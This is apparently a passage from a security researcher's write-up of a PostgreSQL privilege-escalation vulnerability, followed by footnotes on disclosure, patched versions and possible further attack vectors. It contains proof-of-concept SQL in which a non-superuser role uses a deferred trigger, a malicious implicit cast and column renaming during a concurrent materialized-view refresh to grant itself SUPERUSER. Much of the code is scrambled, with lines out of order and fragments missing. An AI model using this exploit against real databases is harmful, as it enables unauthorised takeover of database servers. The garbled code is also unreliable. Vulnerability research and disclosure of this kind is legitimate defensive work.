EXECUTE format('CREATE TEMP TABLE %s()', target);
EXCEPTION WHEN OTHERS THEN -- do nothing
END;
RETURN 2;
END $$ LANGUAGE plpgsql;
CREATE MATERIALIZED VIEW mv AS SELECT conv AS i, 1 AS x;
(i);
\c rdb postgres
REFRESH MATERIALIZED VIEW CONCURRENTLY mv;
Using ALTER TABLE
This version uses ALTER TABLE
to trick the REFRESH
into executing a CAST
function
and works in all unpatched versions:
-- Setup a non-superuser role and database.
CREATE ROLE r0 LOGIN ;
;
\c rdb r0
-- Set up the privilege escalation via a deferred trigger.
AS $$
RETURNS trigger BEGIN
IF current_setting('is_superuser') THEN
RAISE WARNING '-- user % --', current_user;
r0 SUPERUSER;
END IF;
RETURN NEW;
END $$ LANGUAGE plpgsql;
INTEGER);
(i CREATE CONSTRAINT TRIGGER trig
AFTER INSERT ON t1
INITIALLY DEFERRED
FOR EACH ROW EXECUTE PROCEDURE pwn ;
-- Get the (expected) name of the target temp table.
TEXT AS $$
RETURNS SELECT format('%I.%I',
pg_my_temp_schema ::regnamespace,
'pg_temp_' || 'mv'::text::regclass::oid
);
$$ LANGUAGE SQL STABLE ;
-- Create a custom type with a cast that inserts into `t1`.
'e' );
( INTEGER) RETURNS INTEGER LANGUAGE sql AS
( $$ INSERT INTO t1 VALUES ($1) RETURNING $1; $$ ;
INTEGER LANGUAGE sql AS
(etyp) RETURNS $$ SELECT wrap_insert(1); $$ IMMUTABLE ;
CREATE CAST (etyp AS INTEGER) WITH FUNCTION evil(etyp) AS IMPLICIT ;
-- Populate the materialized view with a function that swaps column names on the temp table.
INTEGER AS $$
RETURNS DECLARE
target TEXT := get_target ;
BEGIN
IF to_regclass(target) IS NOT NULL THEN
EXECUTE format('ALTER TABLE %s RENAME COLUMN i TO x', target);
EXECUTE format('ALTER TABLE %s RENAME COLUMN e TO i', target);
EXECUTE format('ALTER TABLE %s RENAME COLUMN x TO e', target);
END IF;
RETURN 1;
END
$$ LANGUAGE plpgsql;
CREATE MATERIALIZED VIEW mv AS SELECT swap AS i, 'e'::etyp as e ;
(i);
\c rdb postgres
REFRESH MATERIALIZED VIEW CONCURRENTLY mv;
Footnotes
In the message for the commit that fixes this vulnerability, the author writes “[As] far as I know this is only exploitable in v15 and below. That’s a fiddly assumption though, so apply this patch to master and all stable versions.” The original notice from Postgres’s website stated “The only known exploit does not work in PostgreSQL 16 and later. For defense in depth, PostgreSQL 16.2 adds the protections that older branches are using to fix their vulnerability.”
After discovering an attack that does work in v16.1 and below, and prior to publishing this article, I notified the PostgreSQL security team. They have since updated the notices.
Though this is mainly an implementation detail, the reason
REFRESH
blocks concurrent readers is that the backend is swapping the physical files that store the results of the prior and current execution of the query. Like other table-rewrite commands (e.g.,TRUNCATE
,CLUSTER
, many forms ofALTER TABLE
), usingREFRESH MATERIALIZED VIEW
withoutCONCURRENTLY
takes anACCESS EXCLUSIVE
lock on the table. UsingCONCURRENTLY
avoids this restriction by modifying the original table instead.While in the SRO sandbox, we won’t be able to so any of these:
SET
orRESET
DISCARD
(session state, e.g. temp tables, cached query plans, etc.)CREATE TEMP
(anything)CREATE CURSOR .. WITH HOLD
CLOSE
(a cursor)PREPARE
(a statement or transaction)DEALLOCATE
(a prepared statement)LISTEN
(for a notification)UNLISTEN
This post shows and refers to PostgreSQL code which is used and protected under the following copyright:
PostgreSQL Database Management System (formerly known as Postgres, then as Postgres95)
Portions Copyright (c) 1996-2011, PostgreSQL Global Development Group
Portions Copyright (c) 1994, The Regents of the University of California
Permission to use, copy, modify, and distribute this software and its documentation for any purpose, without fee, and without a written agreement is hereby granted, provided that the above copyright notice and this paragraph and the following two paragraphs appear in all copies.
IN NO EVENT SHALL THE UNIVERSITY OF CALIFORNIA BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOST PROFITS, ARISING OUT OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION, EVEN IF THE UNIVERSITY OF CALIFORNIA HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
THE UNIVERSITY OF CALIFORNIA SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS ON AN “AS IS” BASIS, AND THE UNIVERSITY OF CALIFORNIA HAS NO OBLIGATIONS TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
An
OID
is an object identifier used internally. Thereg*
type aliases enable conversion to and fromOID
s and strings representations, so'mv'::regclass
finds the integer identifier for the relation'mv'
, using the typical name resolution rules. If that’s used in a string context Postgres converts it to the name, so'foo_' || 'bar'::regclass
would probably result in'foo_bar'
. You can cast thereg*
alias tooid
to get the actual integer so'foo_' || 'bar'::regclass::oid
might yield'foo_1234'
.In a function declaration, Postgres resolves those aliases immediately, uses them to track dependencies, and will give an error if the reference doesn’t exist yet. To use a run-time lookup instead, you have to start with an explicit cast to
text
, hence the seemingly round-about expression'mv'::text::regclass::oid
— it says “at run-time, find the relation'mv'
and return itsOID
”.You can’t normally do
INSERT
orDELETE
on a materialized view, but the code inbackend/executor/execMain.c
checks the value ofMatViewIncrementalMaintenanceIsEnabled()
, which the materialized view code arranges to returnTRUE
by callingOpenMatViewIncrementalMaintenance()
just before the updates.Since the patched code only drops SRO for
CREATE TEMP TABLE ${diffname} (tid pg_catalog.tid)
, as far as I can tell, a successful attack today could only work via an event trigger. You have to be asuperuser
to create one, but it might be a viable attack vector if by chance your administrator in such a way that you can run some code of your own.There might be a vector via a SQL injection attack. The
diffname
is literally justtempname
with_2
appended, and you can renametempRel
before it looks the name up. The code that generates the SQL looks like this:tempRel = ; tempname = ; diffname = ; /* ... */ ; ;
Unfortunately for an attacker,
tempname
is quoted, so although it’s easy to give it a name that breaks assumptions of this code, exploiting it would require somehow bypassing the parser. Maybe that could be done with some sort of character set trickery, but… probably not. Even if it’s possible, you’d almost certainly need to be asuperuser
to set it up, and either way, it would likely have broader attack implications.The commit that removed it called it a “kludge” to let
pg_dump
break circular dependencies in views.When I first went through all this, I ended up adding a second index to the
matview
to call another function when theREFRESH
reached that finalINSERT
step. There, I drop the view and replace it with a regular table, but since the name the code uses is qualified with the temporary schema, and the index function runs in SRO mode, I can’t create a temporary table then. Instead, I had to first create a temp table with an arbitrary name from theattack
function running outside SRO mode, and then within the index function I could drop the view and rename the temp table in its place. Through all that pain, I realized I can just rename the view even though it’s being used in the query.There might be a way to pull off the exploit using an operator after all, but it’s pretty convoluted and would make use of the same trickery as the
CAST
version; in my testing, I couldn’t get around some errors from the planner when it hits theFULL JOIN
, so I’m not sure it’s even possible.If you can install a “trusted” extension, e.g.
hstore
, it can add operators into a schema where you haveCREATE
privileges. If you can create abtree
index naming a column of its type, the generated SQL for the equality comparison either won’t schema-qualify the operator (if you put the extension in thepublic
schema) or will qualify it with one you specified withCREATE EXTENSION
.In either case, you can define your own operator in that schema, which for now I’ll call
s
. TheREFRESH
code will intend to use the operator ins
that was added by the extension, and generate something likenewdata.col OPERATOR(s.=) mv.col
. You can create an operator ins
that names the extension type on the right and some custom type on the left, so if you pull off the same column swap as forCAST
, it should choose your operator instead.I played with the various operator attributes (
COMMUTATOR
,MERGES
, etc.) to try to get around the planner errors, but I didn’t find a working solution.